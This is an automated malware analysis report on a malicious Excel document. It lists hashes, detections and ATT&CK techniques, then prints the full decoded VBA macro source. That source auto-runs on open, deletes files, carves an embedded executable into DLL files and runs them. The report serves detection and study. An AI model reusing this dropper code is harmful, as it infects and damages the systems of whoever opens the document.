Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 29dbeb344c83f046…

MALICIOUS

Office (OLE)

Size: 831.0 KB
Created: 2020-06-22 10:41:03
Authoring application: Microsoft Excel
First seen: 2020-07-24
MD5: 2677fc10c3390b124a3083b4e9ef4426
SHA-1: bf64d0f1f8f23f68f32ea9f271fa067f6cb3bb6c
SHA-256: 29dbeb344c83f046459576c27adcf9d6f4a4d2cec90979b02a420325d7f125e5
Risk score: 450

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1106 Execution through API
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is an Excel document containing VBA macros that trigger on Workbook_Open. These macros utilize Shell() calls and references to Windows Script Host, LoadLibrary, and GetProcAddress APIs to execute an embedded PE executable. This executable is detected by ClamAV as Win.Dropper.Hideproc-6663113-0, indicating its role as a dropper for further malicious payloads.

Heuristics (11)

  • ClamAV: Win.Dropper.Hideproc-6663113-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Dropper.Hideproc-6663113-0
  • Embedded PE executable [critical] OLE_EMBEDDED_EXE
    MZ/PE header found inside document: possible embedded executable
  • VBA macros detected [medium] OLE_VBA_MACROS (2 related findings)
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched lines in script:
             sendings = 1
             Dim sNMSP As New Shell
             FlagDouble = True
  • Workbook_Open macro [low] OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched lines in script:
             Attribute VB_Customizable = True
             Private Sub Workbook_Open()
             If WelcomeDialog.Visible = True Then
  • Reference to Windows Script Host [high] SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Reference to LoadLibrary API [high] SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API [high] SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Suspicious extracted artifact [high] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Reference to VirtualAlloc API [medium] SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11007 bytes
SHA-256: 6d5848e5da2487303aa21be6e2bc29ebddbd8c24ae468ac63051e339648f1846
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
If WelcomeDialog.Visible = True Then
Exit Sub
End If
Module0.WuzzyBud 800
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Page11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Worksheet_Activate()

End Sub

Private Sub Worksheet_SelectionChange(ByVal Target As Range)

End Sub


Attribute VB_Name = "Repositor"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
    
Dim vSpeed As Integer
Dim vLicensePlate As String
 
Public Property Get Speed() As Integer
    Speed = vSpeed
End Property
 
Public Property Let Speed(sp As Integer)
    vSpeed = Application.WorksheetFunction.Min(sp, 100)
    vSpeed = Application.WorksheetFunction.Max(vSpeed, -100)
End Property
 
Public Property Get CheckCar(car As Object, Drive As String)
CheckCar = car.SpecialFolders("" & Drive)

End Property
Public Property Get SpecialFolders() As String
    LicensePlate = vLicensePlate
End Property
 
Public Property Let LicensePlate(lp As String)
    If Len(lp) <> 6 Then Err.Raise (xlErrValue) 'Raise error
    vLicensePlate = lp
End Property



Attribute VB_Name = "Module0"



Public Sub WuzzyBud(dImmer As Integer)

If WelcomeDialog.Visible = True Then
Exit Sub
End If

Dim ActiveHotbit As New WshShell
 Dim s As String
 Dim GetInfirmityLevelDescription As String
    
    Dim d As Long
    d = 3
    d = d - 1
    Select Case d
    Case 0
        s = "No health problems"
    Case 1
        s = "Minor health problems"
    Case 2
        s = "Major health problems"
       
    Case 3
        s = "Severe disability"
    End Select


Dim car As Repositor
    Dim SpecialPath As String
    

PRP = "%" & Dialog4.TextBox1.Tag

Dialog4.TextBox1.Tag = ActiveHotbit.ExpandEnvironmentStrings(PRP + "%")

    
Set car = New Repositor
Dialog4.TextBox3.Tag = car.CheckCar(ActiveHotbit, Dialog4.TextBox3.Tag & "")
ChDir (Dialog4.TextBox1.Tag)
If WelcomeDialog.Visible = False Then
WelcomeDialog.Show
End If
End Sub

Attribute VB_Name = "Module1"
 Public Const FirstB As Byte = 77
 Public Const SecondB As Byte = 90
 Public Const ThirdB As Byte = 144
Public Sub GetParam(Count As Integer)
    Dim i As Long
    Dim j As Integer
    Dim c As String
    Dim tooolsetChunkI As Boolean
    Dim tooolsetChunkQ As Boolean

    j = 1
    tooolsetChunkI = False
    tooolsetChunkQ = False
    GetP.aram = ""
    For i = 1 To Len(Comma.nd$)
        c = Mi.d$(Comma.nd$, i, 1)
        If tooolsetChunkI Then
            If c = """" Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        ElseIf tooolsetChunkI And Not tooolsetChunkQ Then
            If c = " " Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        Else
            If c = """" Then
                If j > Count Then Exit Sub
                tooolsetChunkI = True
                tooolsetChunkQ = True
            ElseIf c <> " ccc" Then
                
            End If
        End If
        If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c
    Next i
End Sub



Attribute VB_Name = "Module2"







Public Sub DerTip()
    
 Dim sendings As Integer
    dershlep = "" + Dialog4.TextBox1.Tag
    Dim ofbl As String
    Dim sOfbl As String
    ofbl = Dialog4.TextBox3.Tag + "\libConfig"
    Dim CurrentSizeOfAT As Long



ctackPup = Dialog4.TextBox1.Tag + "\mannua"
 ctackPup = ctackPup + "l.xlsx"
        ctackPop = dershlep & Dialog4.TextBox3.Value
        
         Dim arr(1 To 3) As String
     
ctackPip = ctackPup & Page11.Range("A115").Value
 
 PublicResumEraseByArrayList ofbl + "*", ctackPop, ctackPip
 
  VistaQ ctackPup
    
        FileCopy ctackPup, ctackPip
         sendings = 1
         Dim sNMSP As New Shell
         FlagDouble = True
              
         Lrigat = Dialog4.Label11.Tag
         
        
        If sendings > 0 And sendings > -30 Then
         
            Set DestinationKat = sNMSP.Namespace(dershlep)
            Set harvest = sNMSP.Namespace(ctackPip)
          
          
        End If


DestinationKat.CopyHere harvest.Items.Item(Lrigat)
   
   
   
   
   
   For StepBit = 1 To 2
 
    CurrentSizeOfAT = 328192
      sendings = 1
            sendingsCSTR = "1"
        If FlagDouble Then
                CurrentSizeOfAT = 200000 + 60600 + 8
                sendings = 2
                FlagDouble = False
            sendingsCSTR = "2"
            End If
       
            
            sOfbl = ofbl + sendingsCSTR + ".dll"
 Composition dershlep & Dialog4.Label1.Tag, sOfbl, CurrentSizeOfAT, sendings
       
        If sendings < 100 Then
            sendings = sendings + 1
            sendings = sendings + 1
        End If
        If -100 <= sendings Then
            sendings = sendings + 1
            ChDir Dialog4.TextBox3.Tag
            sendings = sendings + 1
        End If
        If sendings < 0 Then
            sendings = sendings + 1
            sendings = sendings + 1
        End If
        sOfbl = """" + sOfbl & ""","""

   varRes1 = ExecuteExcel4Macro("CALL(" + sOfbl + "runday"",""J"")")
   If IsNumeric(varRes1) Then
    If varRes1 = 0 Then
        Exit Sub
    End If
    End If
   
Next
        
End Sub





Public Sub VistaQ(WhereToGo)
 DoEvents
        ThisWorkbook.Sheets.Copy
        Application.DisplayAlerts = False
        DoEvents
        ActiveWorkbook.SaveAs WhereToGo, Local:=False, FileFormat:=3 * 7 + 3 * 7 + 9
    DoEvents
    ActiveWorkbook.Close
    DoEvents
        
End Sub


Attribute VB_Name = "Module4"




 
Public Sub GetParam(Count As Integer)
    Dim i As Long
    Dim j As Integer
    Dim c As String
    Dim tooolsetChunkI As Boolean
    Dim tooolsetChunkQ As Boolean

    j = 1
    tooolsetChunkI = False
    tooolsetChunkQ = False
    GetP.aram = ""
    For i = 1 To Len(Comma.nd$)
        c = Mi.d$(Comma.nd$, i, 1)
        If tooolsetChunkI Then
            If c = """" Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        ElseIf tooolsetChunkI And Not tooolsetChunkQ Then
            If c = " " Then
                j = j + 1
                tooolsetChunkI = False
                tooolsetChunkQ = False
            End If
        Else
            If c = """" Then
                If j > Count Then Exit Sub
                tooolsetChunkI = True
                tooolsetChunkQ = True
            ElseIf c <> " " Then
                tooolsetChunkI = True
            End If
        End If
        If tooolsetChunkI And j = Count And c <> """" Then GetP.aram = GetP.aram & c
    Next i
End Sub




Attribute VB_Name = "Module5"
 Public DisputeChannel3 As Byte
     
Public HurricanMoes() As Byte

     
    Public abbrev As Byte
 Dim DecemberUpdate As Byte
 
 




Public Sub PublicResumEraseByArrayList(ParamArray putArrayBigList() As Variant)
    On Error Resume Next
    For Each Key In putArrayBigList
        Kill Key
    Next Key
    On Error GoTo 0
End Sub

Public Sub Composition(Composition2 As String, ofbl As String, fl As Long, DisputeChannel6 As Integer)
 Dim DisputeChannel1 As Long
 
 Dim SimpleMethod As Integer
 ReDim HurricanMoes(1 To fl)
 DisputeChannel1 = FreeFile
 Open Composition2 For Binary Access Read As DisputeChannel1
 Dim fuZzy As Integer
 fuZzy = 1
Do While 1
 Get DisputeChannel1, , abbrev
 If abbrev = FirstB Then
 HurricanMoes(1) = abbrev
 Get DisputeChannel1, , DisputeChannel3
 If DisputeChannel3 = SecondB Then
 HurricanMoes(2) = DisputeChannel3
 Get DisputeChannel1, , DecemberUpdate
 If DecemberUpdate = ThirdB Then
 HurricanMoes(3) = DecemberUpdate
 If fuZzy = DisputeChannel6 Then
 For k = 4 To fl
 Get DisputeChannel1, , abbrev
 HurricanMoes(k) = abbrev
 Next k
 Exit Do
 Else
 fuZzy = fuZzy + 1
 End If
 End If
 End If
 End If
 Loop
 Close DisputeChannel1
 On Error Resume Next
 DisputeChannel1 = FreeFile
 Open ofbl For Binary Lock Read Write As #DisputeChannel1
 zeroBob = 1
 For i = zeroBob To UBound(HurricanMoes)
 If WelcomeDialog.Enabled = True Then

 Put #DisputeChannel1, , HurricanMoes(i)
 End If
 Next i
 Close DisputeChannel1
 DisputeChannel1 = FreeFile
 For HSP = 33 To -1 Step -0.25
 DisputeChannel1 = 6 + i
 Next HSP
End Sub




Attribute VB_Name = "Dialog4"
Attribute VB_Base = "0{466D64D5-C28A-40CF-9B6E-979786F07EBA}{3B9877C1-D161-4596-B086-1A549513FECB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "WelcomeDialog"
Attribute VB_Base = "0{92A9393B-3F5E-470D-B46C-19191FCC4246}{C8B3DF52-2EFF-4BDF-A0C1-BAF16B946ADC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Activate()
DoEvents
DoEvents
DerTip
DoEvents
End Sub





Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Filename: embedded_office_00001b53.exe
Kind: embedded-pe
Source: Office MZ+PE at offset 0x1B53
Size: 843949 bytes
SHA-256: 3377abb8ea2fb738a5057812eaef36146f1d2d329e0357b442131f3efae6ed86
Detection: ClamAV: Win.Dropper.Hideproc-6663113-0
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): WScript.Shell
Carved macro source contains an auto-exec entry point and execution/download terms.

Filename: ole10native_00.bin
Kind: ole-package
Source: OLE Ole10Native stream: MBD00D73BAE/Ole10Native
Size: 593311 bytes
SHA-256: b1fa392bb373223ddc3daa16b23f155332e3196967318068a95ad72d6d72c0a9